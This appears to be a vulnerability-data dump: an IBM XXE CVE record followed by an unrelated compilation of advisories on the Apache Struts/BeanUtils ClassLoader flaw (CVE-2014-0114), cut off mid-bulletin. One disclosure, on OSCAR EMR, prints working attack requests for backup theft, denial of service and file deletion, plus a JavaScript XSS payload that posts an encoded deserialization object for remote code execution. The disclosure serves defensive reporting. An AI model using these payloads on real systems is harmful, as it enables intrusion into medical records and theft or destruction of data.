{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:22:08.341Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6462861" }, { "name": "ibm-ftm-cve20205003-xxe (192956)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192956" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2021-06-10T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 192956." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "NONE", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.7, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:L/UI:N/PR:N/I:N/C:H/AV:N/AC:H/S:U/RC:C/E:U/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-06-11T14:25:17", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6462861" }, { "name": "ibm-ftm-cve20205003-xxe (192956)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192956" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-06-10T00:00:00", "ID": "CVE-2020-5003", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to an XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 192956." } ] }, "impact": { "cvssv3": { "BM": { "A": "L", "AC": "H", "AV": "N", "C": "H", "I": "N", "PR": "N", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6462861", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6462861 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6462861" }, { "name": "ibm-ftm-cve20205003-xxe (192956)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/192956" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-5003", "datePublished": "2021-06-11T14:25:18.066355Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-16T18:38:24.462Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
var-201404-0288
Vulnerability from variot
Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in Apache Struts 1.x through 1.3.10 and in other products requiring commons-beanutils through 1.9.2, does not suppress the class property, which allows remote attackers to "manipulate" the ClassLoader and execute arbitrary code via the class parameter, as demonstrated by the passing of this parameter to the getClass method of the ActionForm object in Struts 1. Apache Struts is prone to a security-bypass vulnerability because it fails to adequately handle user-supplied input. An attacker can exploit this issue to bypass certain security restrictions and perform unauthorized actions. This may lead to further attacks. Apache Struts versions 1.0.0 through 1.3.10 are vulnerable.
Security Fix(es):
-
Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
-
thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands (CVE-2016-5397)
-
slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution (CVE-2018-8088)
-
jolokia: JMX proxy mode vulnerable to remote code execution (CVE-2018-1000130)
-
bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data (CVE-2016-1000338)
-
bouncycastle: Information leak in AESFastEngine class (CVE-2016-1000339)
-
bouncycastle: Information exposure in DSA signature generation via timing attack (CVE-2016-1000341)
-
bouncycastle: ECDSA improper validation of ASN.1 encoding of signature (CVE-2016-1000342)
-
bouncycastle: DHIES implementation allowed the use of ECB mode (CVE-2016-1000344)
-
bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack (CVE-2016-1000345)
-
bouncycastle: Other party DH public keys are not fully validated (CVE-2016-1000346)
-
bouncycastle: ECIES implementation allowed the use of ECB mode (CVE-2016-1000352)
-
async-http-client: Invalid URL parsing with '?' (CVE-2017-14063)
-
undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service (CVE-2018-1114)
-
spring-framework: Directory traversal vulnerability with static resources on Windows filesystems (CVE-2018-1271)
-
tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service (CVE-2018-1338)
-
tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service (CVE-2018-1339)
-
pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF (CVE-2018-8036)
-
jolokia: Cross site scripting in the HTTP servlet (CVE-2018-1000129)
-
bouncycastle: flaw in the low-level interface to RSA key pair generator (CVE-2018-1000180)
-
bouncycastle: Carry propagation bug in math.raw.Nat??? class (CVE-2016-1000340)
-
bouncycastle: DSA key pair generator generates a weak private key by default (CVE-2016-1000343)
-
spring-framework: Multipart content pollution (CVE-2018-1272)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
Red Hat would like to thank Chris McCown for reporting CVE-2018-8088.
Installation instructions are located in the download section of the customer portal. Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters 1487563 - CVE-2017-14063 async-http-client: Invalid URL parsing with '?' 1544620 - CVE-2016-5397 thrift: Improper file path sanitization in t_go_generator.cc:format_go_output() of the go client library can allow an attacker to inject commands 1548909 - CVE-2018-8088 slf4j: Deserialisation vulnerability in EventData constructor can allow for arbitrary code execution 1559316 - CVE-2018-1000130 jolokia: JMX proxy mode vulnerable to remote code execution 1559317 - CVE-2018-1000129 jolokia: Cross site scripting in the HTTP servlet 1564408 - CVE-2018-1272 spring-framework: Multipart content pollution 1571050 - CVE-2018-1271 spring-framework: Directory traversal vulnerability with static resources on Windows filesystems 1572421 - CVE-2018-1338 tika: Infinite loop in BPGParser can allow remote attacker to cause a denial of service 1572424 - CVE-2018-1339 tika: Infinite loop in ChmParser can allow remote attacker to cause a denial of service 1573045 - CVE-2018-1114 undertow: File descriptor leak caused by JarURLConnection.getLastModified() allows attacker to cause a denial of service 1588306 - CVE-2018-1000180 bouncycastle: flaw in the low-level interface to RSA key pair generator 1588313 - CVE-2016-1000338 bouncycastle: DSA does not fully validate ASN.1 encoding during signature verification allowing for injection of unsigned data 1588314 - CVE-2016-1000344 bouncycastle: DHIES implementation allowed the use of ECB mode 1588323 - CVE-2016-1000345 bouncycastle: DHIES/ECIES CBC modes are vulnerable to padding oracle attack 1588327 - CVE-2016-1000346 bouncycastle: Other party DH public keys are not fully validated 1588330 - CVE-2016-1000352 bouncycastle: ECIES implementation allowed the use of ECB mode 1588688 - CVE-2016-1000340 bouncycastle: Carry propagation bug in math.raw.Nat??? class 1588695 - CVE-2016-1000339 bouncycastle: Information leak in AESFastEngine class 1588708 - CVE-2016-1000341 bouncycastle: Information exposure in DSA signature generation via timing attack 1588715 - CVE-2016-1000342 bouncycastle: ECDSA improper validation of ASN.1 encoding of signature 1588721 - CVE-2016-1000343 bouncycastle: DSA key pair generator generates a weak private key by default 1597490 - CVE-2018-8036 pdfbox: Infinite loop in AFMParser.java allows for out of memory erros via crafted PDF
- Summary:
Fuse ESB Enterprise 7.1.0 R1 P4 (Patch 4 on Rollup Patch 1), a security update that addresses one security issue, is now available from the Red Hat Customer Portal. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions. (CVE-2014-0114)
Refer to the readme.txt file included with the patch files for installation instructions.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0114 http://advisories.mageia.org/MGASA-2014-0219.html
Updated Packages:
Mandriva Enterprise Server 5: 2341ea3fd6c92a10ab4c0be7ef5ca9da mes5/i586/struts-1.2.9-6.1mdvmes5.2.i586.rpm 8d911347cc4fdb08383a2d6ad21860e6 mes5/i586/struts-javadoc-1.2.9-6.1mdvmes5.2.i586.rpm fc1e7ac540a1d4c923cf773769c976b2 mes5/i586/struts-manual-1.2.9-6.1mdvmes5.2.i586.rpm 3304297e4b88aae688e8edcdd11bf478 mes5/i586/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.i586.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Enterprise Server 5/X86_64: 7e2abd47c0862fa5010ee686d76d2353 mes5/x86_64/struts-1.2.9-6.1mdvmes5.2.x86_64.rpm 96dd8e36bf4b46577498ad8616dce319 mes5/x86_64/struts-javadoc-1.2.9-6.1mdvmes5.2.x86_64.rpm 37a1b595d7f2f73bdff8d13bcb70e0a6 mes5/x86_64/struts-manual-1.2.9-6.1mdvmes5.2.x86_64.rpm 8c298a1e1e9e8ad81acb0166b2f18109 mes5/x86_64/struts-webapps-tomcat5-1.2.9-6.1mdvmes5.2.x86_64.rpm b508c226756fcb2a82a8b5e2e84af466 mes5/SRPMS/struts-1.2.9-6.1mdvmes5.2.src.rpm
Mandriva Business Server 1/X86_64: 1e1b9440affefd05d5fe0c4860fdcd9b mbs1/x86_64/struts-1.3.10-3.1.mbs1.noarch.rpm 5ae68b0b7f991676f67562a51dd956a7 mbs1/x86_64/struts-javadoc-1.3.10-3.1.mbs1.noarch.rpm f135f96b6d2121b157b7a62afd449ea6 mbs1/SRPMS/struts-1.3.10-3.1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.12 (GNU/Linux)
iD8DBQFTdeNbmqjQ0CJFipgRAo5XAJ4oaaS6iRfHSPHEO3og+Se4kWkdfgCgrhMb HUtc9GTxbEwte2/fTU7bJ5M= =5Ewj -----END PGP SIGNATURE----- . Title: Multiple vulnerabilities in OSCAR EMR Product: OSCAR EMR Vendor: Oscar McMaster Tested version: 15.21beta361 Remediation status: Unknown Reported by: Brian D. Hysell
Product Description:
"OSCAR is open-source Electronic Medical Record (EMR) software that was first developed at McMaster University by Dr. David Chan. It is continuously enriched by contributions from OSCAR users and the Charter OSCAR Service Providers that support them. OSCAR has been certified by OntarioMD, and verified as IHE compliant, achievements made possible by the creation and success of OSCAR EMRas ISO 13485:2003 certified Quality Management System."
Timeline:
29 Mar 2016 - Vendor contacted 29 Mar 2016 - Vendor responded 29 Apr 2016 - Vendor contacted for permission to share redacted report with third party 02 May 2016 - Vendor responded 17 Jan 2017 - Lead developer contacted (no response) 01 Jul 2018 - Vendor and lead developer contacted for follow-up, informed of intended 15 Aug disclosure (no response) 12 Aug 2018 - Alternate email address attempted for lead developer (no response) 15 Aug 2018 - Vulnerabilities publicly disclosed
Contents:
This report uses OVE identifiers: http://www.openwall.com/ove/
OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency OVE-20160329-0003: Remote code execution via unsafe object deserialization OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface OVE-20160329-0007: SQL injection OVE-20160329-0008: Path traversal OVE-20160329-0002: Insecure direct object reference in document manager OVE-20160329-0005: Denial of service via resource exhaustion OVE-20160329-0006: Insecure password storage OVE-20160329-0009: Cross-site request forgery
Issue details:
=== OVE-20160329-0001: Database backup disclosure or denial of service via insecure dependency ===
OSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to CVE-2014-0114.
An authenticated user can issue the following request with different / omitted cookie headers: /oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster
Consequently, he or she can access (using a valid session cookie), e.g., /oscar/OscarBackup.sql.gz
An unauthenticated attacker is prevented from doing likewise by the aLoginFiltera servlet filter, but can still carry out a denial-of-service attack impeding any access to the application until Tomcat is restarted by issuing a request like the following: /oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid
=== OVE-20160329-0003: Remote code execution via unsafe object deserialization ===
TraceabilityReportProcessor deserializes user-provided data, allowing remote code execution given the presence of known-vulnerable libraries in the classpath such as ROME 1.0. This functionality is only available to administrators but can be exploited via XSS (OVE-20160329-0004) or CSRF (issue 9) using a payload generated with ysoserial.
In the tested configuration PMmodule/GenericIntake/ImportForm.jsp is inaccessible due to the following exception aorg.springframework.beans.factory.NoSuchBeanDefinitionException: No bean named 'oscarSecurityManager' is defineda, but were it to be accessible, it would be vulnerable as well.
=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in security report interface ===
logReport.jsp, in general, does not escape data it outputs to the page; in particular, on line 283, prop.getProperty("contentId") is printed unescaped. As a result, if an attacker includes Javascript in his or her username during a login attempt, it will be executed if an administrator views the Security Log Report for that timeframe. The text printed in the "Keyword" column is cut off at 80 characters, but that is more than enough to load an externally-hosted script, such as the following script exploiting the deserialization RCE OVE-20160329-0003:
var decodedBase64 = atob("H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA=="); var binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); for(var i = 0; i < binaryArray.length; i++) { binaryArray[i] = decodedBase64.charCodeAt(i); } var payload = new Blob([binaryArray], {type: "application/x-gzip"}); var formData = new FormData(); formData.append("file", payload); formData.append("submit", "Generate"); var xhr = new XMLHttpRequest(); xhr.open("POST", "/oscar/admin/GenerateTraceabilityReportAction.do"); xhr.send(formData);
XSS was not a focus of this test; other confirmed or likely XSS vulnerabilities are: * Reflected XSS through the errormsg parameter in loginfailed.jsp * Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp * Reflected XSS through the noteId parameter, line 1562 in CaseManagementViewAction (untested) * Reflected XSS through the pdfName parameter when an exception has been thrown, line 1174 in ManageDocumentAction (untested) * Reflected XSS through the pharmaName and pharmaFax parameters, line 149 in FrmCustomedPDFServlet (untested) * Reflected XSS through the id and followupValue parameters, line 81 in EctAddShortMeasurementAction (untested)
=== OVE-20160329-0007: SQL injection ===
On line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is concatenated into an SQL statement rather than parameterized; likewise the content parameter on lines 217, 223, and 229 of admin/logReport.jsp. In both cases these errors result in error-based SQL injection vulnerabilities; the former allows authenticated users with access to oscarMDS/PatientSearch.jsp to access information beyond their privilege levels while the latter is accessible only to administrators.
=== OVE-20160329-0008: Path traversal ===
ImportLogDownloadAction reads and outputs an arbitrary absolute file path provided by the user; DelImageAction deletes a user-specified filename without accounting for the possibility of relative path traversal (i.e., the inclusion of "../" in the filename).
Any authenticated user can exploit the former issue to steal files from the system, e.g., /oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz
An authenticated user with access to eforms can delete files writeable by the Tomcat user, e.g., /oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp
=== OVE-20160329-0002: Insecure direct object reference in document manager ===
ManageDocumentAction.display() does not check the permissions associated with the requested document ID (doc_no) before providing it to the requesting user. Given /oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a user with access to the document management interface can view arbitrary documents by incrementing or decrementing X, regardless of whether they have been marked private.
=== OVE-20160329-0005: Denial of service via resource exhaustion ===
uploadSignature.jsp, which is accessible to and operable by unauthenticated users, saves uploaded files to a temporary directory but never deletes them. An attacker can upload many junk files and eventually consume all disk space available to the /tmp directory, impeding access to the application depending on the functionality in question and the partition layout of the host system (the effects are crippling and pervasive if /tmp is on the same partition as /; they are much less so if /tmp is on a separate partition).
=== OVE-20160329-0006: Insecure password storage ===
Passwords are stored as SHA-1 hashes; unless unusually complex, passwords stored in that manner are typically easily recoverable with a tool such as oclHashcat. In OSCAR each hash is stored as a string of decimal numbers, rather than hexadecimal or raw bytes. This somewhat non-traditional representation adds a bit of programming work to the cracking process, but does not represent a major impediment to attack.
=== OVE-20160329-0009: Cross-site request forgery ===
The application lacks protection against cross-site request forgery attacks. A CSRF attack could be used against an administrator to exploit the deserialization RCE in a manner similar to the example provided with OVE-20160329-0004.
References:
CVE-2014-0114 (SSRT101662)
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
SiteScope Affected version Resolution patch details Link to download
11.1x SiteScope 11.13 Windows 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00315
SiteScope 11.13 Windows 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00316
SiteScope 11.13 Linux 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00317
SiteScope 11.13 Linux 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00318
SiteScope 11.13 Solaris 32-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00319
SiteScope 11.13 Solaris 64-bit Cumulative Fixes http://support.openview.hp.com/selfsolve/document/LID/SIS_00320
11.2x SiteScope 11.24.271 Intermediate Patch for Windows 32bit and 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00321
SiteScope 11.24.271 Intermediate Patch for Windows 32bit on 64bit http://support.openview.hp.com/selfsolve/document/LID/SIS_00322
SiteScope 11.24.271 Intermediate Patch for Linux http://support.openview.hp.com/selfsolve/document/LID/SIS_00323
SiteScope 11.24.271 Intermediate Patch for Solaris http://support.openview.hp.com/selfsolve/document/LID/SIS_00324
HISTORY Version:1 (rev.1) - 12 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201607-09
https://security.gentoo.org/
Severity: Normal Title: Commons-BeanUtils: Arbitrary code execution Date: July 20, 2016 Bugs: #534498 ID: 201607-09
Synopsis
Apache Commons BeanUtils does not properly suppress the class property, which could lead to the remote execution of arbitrary code.
Workaround
There is no known workaround at this time.
Resolution
All Commons BeanUtils users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/commons-beanutils-1.9.2"
References
[ 1 ] CVE-2014-0114 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0114
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201607-09
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2016 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: Red Hat A-MQ Broker 7.5 release and security update Advisory ID: RHSA-2019:2995-01 Product: Red Hat JBoss AMQ Advisory URL: https://access.redhat.com/errata/RHSA-2019:2995 Issue date: 2019-10-10 Keywords: amq,messaging,integration,broker Cross references: RHEA-2019:45713-01 CVE Names: CVE-2014-0114 ==================================================================== 1. Summary:
Red Hat A-MQ Broker 7.5 is now available from the Red Hat Customer Portal.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
AMQ Broker is a high-performance messaging implementation based on ActiveMQ Artemis. It uses an asynchronous journal for fast message persistence, and supports multiple languages, protocols, and platforms.
This release of Red Hat A-MQ Broker 7.5.0 serves as a replacement for Red Hat A-MQ Broker 7.4.1, and includes security and bug fixes, and enhancements. For further information, refer to the release notes linked to in the References section.
Security Fix(es):
- Apache Struts 1: Class Loader manipulation via request parameters (CVE-2014-0114)
For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
Before applying the update, back up your existing installation, including all applications, configuration files, databases and database settings, and so on.
The References section of this erratum contains a download link (you must log in to download the update).
- Bugs fixed (https://bugzilla.redhat.com/):
1091938 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters
- JIRA issues fixed (https://issues.jboss.org/):
ENTMQBR-2849 - CVE-2014-0114 Apache Struts 1: Class Loader manipulation via request parameters [amq-7.4.0]
- References:
https://access.redhat.com/security/cve/CVE-2014-0114 https://access.redhat.com/security/updates/classification/#important https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.5.0 https://access.redhat.com/documentation/en-us/red_hat_amq/7.5/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2019 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBXZ7b4tzjgjWX9erEAQhy1BAAlZY3SIVWWf78mbhIhS4x+DCzq6s6W+B7 gh7bSOfLCqLNVyuqI99PH920CgZwtrN01VVt2by822MdIKKKHtbjFTzstm1ucLso QlYBLkmPzkC0xGPP4q67EDhr5KctJ4wlkerTnBhfwJxvFBLZnWzgGvmawbf3X7iQ qWwigzfVjiUwen7pv5Bol4WkzhTbvUxPEVDS696ziJI0zPyqnnDXpl+9lnXcYL0m GLsD59I984+gLxpl9fzgOPZxm2U1gGusO5rM9vUPmGX06XJo1nsUKUuhRfLoNwQm YcK6yVFE+TAOAKbmM2o62hnA/+UemV/bBQJh3ymVgjcHSz8UYae4vfmiPfiyBsVv STakDzO5yz+htMLJWVAnHjLEgbcGgzrH7jqXLzNO47bZR0oVVP6RjZnsZCdhxeT7 mPZtwWSVHFl8GRriGvEKQjC27Majwva5Hnwh82IPr5lgbLpWmvQSBzDHIObdyPts UYk+zBhZHNXzdQrnEA2BzhsXehZiMigKefutBPPEc+iXjFsLSTmGYceECyhUP/No RuQTYanb0GdgPDpgCOoDIgPtY3VyMiCur8BkQKGIyJt4aXdSaBoqAXt4KypAFExG lRVXHA8RRVcnqsxcpCA+VesIbPuTzmCSsgkQckv/TGLFgdAMLOA4J38bUCjulvMm 9D+Pu+r8KbU=kdcn -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05324755
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c05324755 Version: 1
HPSBGN03669 rev.1 - HPE SiteScope, Local Elevation of Privilege, Remote Denial of Service, Arbitrary Code Execution and Cross-Site Request Forgery
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2016-11-04 Last Updated: 2016-11-04
Potential Security Impact: Local: Elevation of Privilege; Remote: Arbitrary Code Execution, Cross-Site Request Forgery (CSRF), Denial of Service (DoS)
Source: Hewlett Packard Enterprise, Product Security Response Team
VULNERABILITY SUMMARY Potential vulnerabilities have been identified in HPE SiteScope. The vulnerabilities could be exploited to allow local elevation of privilege and exploited remotely to allow denial of service, arbitrary code execution, cross-site request forgery.
References:
- CVE-2014-0114 - Apache Struts, execution of arbitrary code
- CVE-2016-0763 - Apache Tomcat, denial of service (DoS)
- CVE-2014-0107 - Apache XML Xalan, bypass expected restrictions
- CVE-2015-3253 - Apache Groovy, execution of arbitrary code
- CVE-2015-5652 - Python, elevation of privilege
- CVE-2013-6429 - Spring Framework, cross-site request forgery
- CVE-2014-0050 - Apache Commons FileUpload, denial of service (DoS)
- PSRT110264
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.
- HP SiteScope Monitors Software Series 11.2xa11.32IP1
BACKGROUND
CVSS Base Metrics ================= Reference, CVSS V3 Score/Vector, CVSS V2 Score/Vector
CVE-2013-6429
6.5 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L
6.8 (AV:N/AC:M/Au:N/C:P/I:P/A:P)
CVE-2014-0050
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0107
8.3 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2014-0114
6.8 CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVE-2015-3253
